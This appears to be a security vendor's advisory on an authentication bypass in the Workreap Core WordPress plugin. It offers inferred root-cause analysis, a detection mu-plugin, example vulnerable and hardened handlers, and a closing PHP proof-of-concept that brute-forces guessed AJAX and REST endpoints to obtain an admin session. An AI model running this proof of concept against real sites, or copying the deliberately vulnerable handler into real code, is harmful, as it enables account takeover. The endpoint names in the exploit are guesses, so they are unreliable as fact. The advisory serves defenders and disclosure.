Atomic Edge analysis of CVE-2025-69101 (metadata-based):
The Workreap Core plugin for WordPress, versions up to and including 3.4.0, contains an authentication bypass vulnerability. This flaw allows unauthenticated attackers to authenticate as any registered user without providing valid credentials. The CVSS 3.1 score of 9.8 (Critical) reflects the complete lack of required privileges, low attack complexity, and full impact on confidentiality, integrity, and availability.
Atomic Edge research indicates the root cause is CWE-288: Authentication Bypass Using an Alternate Path or Channel. This classification suggests the plugin provides an alternative authentication mechanism that lacks proper identity verification. The vulnerability likely exists in a custom authentication endpoint, AJAX handler, or REST API route that accepts user identifiers without validating the requester’s permission to assume that identity. This conclusion is inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.
Exploitation involves sending crafted requests to a vulnerable endpoint that processes authentication requests. Based on WordPress plugin patterns, the attack vector is likely an AJAX handler at /wp-admin/admin-ajax.php with an action parameter containing ‘workreap’ or ‘workreap_core’. Attackers would send POST requests containing a target user identifier parameter (such as user_id, email, or username) without providing corresponding authentication credentials. The plugin then improperly establishes a session for the specified user.
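Because the attack vector described above is a POST to admin-ajax.php (or a REST route) that ends in a session being set for an arbitrary user, the most reliable place to observe it is the moment WordPress issues the authentication cookie. The following must-use plugin is an added detection example, not Workreap's code and not part of the Atomic Edge proof of concept: it hooks the core `set_auth_cookie` action and logs every login cookie issued outside the normal wp-login.php flow, together with the AJAX action or REST context that triggered it. The function name and the `[auth-audit]` log prefix are assumptions.

```php
<?php
/**
 * Added example (hypothetical mu-plugin, not the Workreap Core plugin's code):
 * audit every authentication cookie issued outside wp-login.php so that a
 * bypass through an AJAX or REST handler leaves a record. Place the file in
 * wp-content/mu-plugins/ so it loads before any regular plugin.
 */

// Core fires 'set_auth_cookie' from wp_set_auth_cookie() for every login
// cookie it creates, whatever code path asked for it.
add_action('set_auth_cookie', 'example_audit_auth_cookie', 10, 6);

function example_audit_auth_cookie($auth_cookie, $expire, $expiration, $user_id, $scheme, $token) {
    global $pagenow;

    // A normal interactive login goes through wp-login.php; nothing to flag.
    if ('wp-login.php' === $pagenow) {
        return;
    }

    $user  = get_userdata($user_id);
    $entry = [
        'time'    => gmdate('c'),
        'user_id' => (int) $user_id,
        'login'   => $user ? $user->user_login : '?',
        'method'  => $_SERVER['REQUEST_METHOD'] ?? '',
        'uri'     => $_SERVER['REQUEST_URI'] ?? '',
        // For admin-ajax.php requests, record which plugin action ran.
        'ajax'    => wp_doing_ajax() ? ($_REQUEST['action'] ?? '') : null,
        'rest'    => defined('REST_REQUEST') && REST_REQUEST,
        'remote'  => $_SERVER['REMOTE_ADDR'] ?? '',
        'referer' => $_SERVER['HTTP_REFERER'] ?? '',
    ];

    // A cookie for a privileged account issued from a non-standard path is
    // the signature of the bypass described in the advisory.
    $entry['severity'] = user_can($user_id, 'manage_options') ? 'HIGH' : 'INFO';

    // Ship to the PHP error log; forward from there to a SIEM as needed.
    error_log('[auth-audit] ' . wp_json_encode($entry));
}
```

Any `[auth-audit]` line whose `ajax` value contains the vulnerable plugin's slug, or whose `rest` flag is set, and that was not preceded by a credentialed login from the same client, is worth treating as an attempted or successful bypass. Legitimate plugin-driven logins (social login, one-time links) also appear here, so tune on the `ajax`/`uri` values once a baseline is known.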
Remediation requires implementing proper authentication checks on all user identity assumption functions. The plugin must verify that the requester has legitimate authorization to authenticate as the target user, typically by requiring valid credentials or a secure token. All authentication endpoints should validate session tokens or nonces and ensure the requesting user matches the target user being authenticated. WordPress capability checks (current_user_can) should also be applied where appropriate.
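To make the remediation concrete, the following is an added example and not code from the Workreap Core plugin (whose source was not available to this analysis): a hypothetical AJAX handler that exhibits the CWE-288 pattern the advisory describes, followed by hardened handlers that require credentials for a login and an existing session plus nonce and capability checks for switching accounts. Every function and action name prefixed `example_` is an assumption; the WordPress APIs used (`check_ajax_referer`, `wp_signon`, `current_user_can`, `wp_set_auth_cookie`) are real core functions.

```php
<?php
// Added example (hypothetical handlers, not the Workreap Core plugin's code).

// --- Vulnerable pattern -------------------------------------------------
// Registered for unauthenticated callers (wp_ajax_nopriv_*) and trusting a
// client-supplied identifier: anyone who can POST to admin-ajax.php obtains a
// session for the named user. This is the alternate authentication path of
// CWE-288 in its simplest form.
function example_vulnerable_login_as() {
    $user = get_user_by('login', sanitize_user($_POST['username'] ?? ''));
    if ($user) {
        wp_set_current_user($user->ID);
        wp_set_auth_cookie($user->ID);          // identity never verified
        wp_send_json_success(['redirect' => admin_url()]);
    }
    wp_send_json_error('no such user', 404);
}
add_action('wp_ajax_nopriv_example_login_as', 'example_vulnerable_login_as');
add_action('wp_ajax_example_login_as', 'example_vulnerable_login_as');

// --- Hardened form 1: login must present credentials ----------------------
// wp_signon() performs the password check and sets the cookie itself, so the
// handler never decides on its own whose session to create.
function example_hardened_login() {
    check_ajax_referer('example_login_nonce', 'nonce');   // CSRF protection
    $creds = [
        'user_login'    => sanitize_user($_POST['username'] ?? ''),
        'user_password' => $_POST['password'] ?? '',
        'remember'      => false,
    ];
    $user = wp_signon($creds, is_ssl());
    if (is_wp_error($user)) {
        wp_send_json_error('invalid credentials', 401);
    }
    wp_send_json_success(['redirect' => admin_url()]);
}
add_action('wp_ajax_nopriv_example_login', 'example_hardened_login');

// --- Hardened form 2: account switching is a privileged operation ---------
// Never registered under wp_ajax_nopriv_*; requires a live session, a nonce,
// and the caller must either be the target user or hold the edit_user
// capability for that account. The switch is logged for audit.
function example_hardened_switch_user() {
    check_ajax_referer('example_switch_nonce', 'nonce');
    if (!is_user_logged_in()) {
        wp_send_json_error('authentication required', 401);
    }
    $target_id = absint($_POST['user_id'] ?? 0);
    if (!get_userdata($target_id)) {
        wp_send_json_error('no such user', 404);
    }
    if ($target_id !== get_current_user_id() && !current_user_can('edit_user', $target_id)) {
        wp_send_json_error('forbidden', 403);
    }
    error_log(sprintf('[switch-user] %d -> %d', get_current_user_id(), $target_id));
    wp_set_auth_cookie($target_id);
    wp_send_json_success();
}
add_action('wp_ajax_example_switch_user', 'example_hardened_switch_user');
```

The design point is that the hardened handlers never take an identity from the request and act on it directly: a login is delegated to `wp_signon()`, which verifies the password, and a switch is permitted only when the caller already holds a session and passes both the nonce and a capability check on the specific target user.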
Successful exploitation grants attackers full access to any user account, including administrators. Attackers can perform all actions available to the compromised user: modify site content, change settings, install plugins, upload malicious files, access sensitive data, and delete information. This vulnerability enables complete site takeover and data compromise without requiring any prior authentication.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69101 - Workreap Core <= 3.4.0 - Authentication Bypass

/**
 * Proof of Concept for CVE-2025-69101
 * This script demonstrates authentication bypass in Workreap Core plugin.
 * Assumptions based on WordPress plugin patterns and CWE-288:
 * 1. The plugin exposes an AJAX endpoint for authentication/user switching
 * 2. The endpoint accepts a user identifier parameter without proper verification
 * 3. The endpoint returns a session cookie or sets WordPress authentication
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Common WordPress AJAX endpoint for plugin handlers
$ajax_endpoint = '/wp-admin/admin-ajax.php';

// The action parameter likely contains 'workreap' based on plugin slug.
// Multiple possible action names are tested based on common patterns.
$possible_actions = [
    'workreap_switch_user',
    'workreap_login_as',
    'workreap_authenticate',
    'workreap_core_auth',
    'workreap_impersonate'
];

// Target user to authenticate as (change to existing user ID, email, or username)
$target_user = 'admin'; // Could be user ID, email, or username

foreach ($possible_actions as $action) {
    echo "Testing action: $action\n";
    $ch = curl_init();
    $post_data = [
        'action'   => $action,
        'user_id'  => $target_user, // Common parameter name
        'email'    => $target_user, // Alternative parameter
        'username' => $target_user, // Alternative parameter
        'user'     => $target_user  // Generic parameter
    ];
    curl_setopt_array($ch, [
        CURLOPT_URL            => $target_url . $ajax_endpoint,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER         => true, // Capture headers to check for Set-Cookie
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT      => 'Atomic Edge Research PoC'
    ]);
    $response    = curl_exec($ch);
    $http_code   = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $headers     = substr($response, 0, $header_size);
    $body        = substr($response, $header_size);
    curl_close($ch);

    // Check for signs of successful authentication
    if (strpos($headers, 'Set-Cookie: wordpress_logged_in') !== false ||
        strpos($headers, 'Set-Cookie: wp-settings') !== false ||
        strpos($body, 'success') !== false ||
        strpos($body, 'redirect') !== false) {
        echo "[SUCCESS] Possible authentication bypass via action: $action\n";
        echo "Response Headers:\n$headers\n";
        echo "Response Body (first 500 chars):\n" . substr($body, 0, 500) . "\n";
        break;
    } else {
        echo "[FAILED] Action $action did not appear to work (HTTP $http_code)\n";
    }
}

// Alternative: Test REST API endpoint if AJAX fails.
// Many plugins use REST API for authentication functions.
$rest_endpoints = [
    '/wp-json/workreap/v1/auth',
    '/wp-json/workreap/v1/login',
    '/wp-json/workreap/v1/user/switch',
    '/wp-json/wp/v2/users/' . $target_user . '/session' // Generic pattern
];

echo "\nTesting REST API endpoints...\n";
foreach ($rest_endpoints as $endpoint) {
    echo "Testing endpoint: $endpoint\n";
    $ch = curl_init();
    $post_data = json_encode([
        'user_id'  => $target_user,
        'email'    => $target_user,
        'username' => $target_user
    ]);
    curl_setopt_array($ch, [
        CURLOPT_URL            => $target_url . $endpoint,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER         => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER     => [
            'Content-Type: application/json',
            'Content-Length: ' . strlen($post_data)
        ]
    ]);
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code == 200 || $http_code == 201) {
        echo "[POSSIBLE] REST endpoint $endpoint returned success (HTTP $http_code)\n";
        echo "Check response for authentication tokens or session data.\n";
    }
}

echo "\nPoC complete. If successful, the script may have obtained a session cookie.\n";
echo "Validate by visiting $target_url/wp-admin/ with the captured cookies.\n";
?>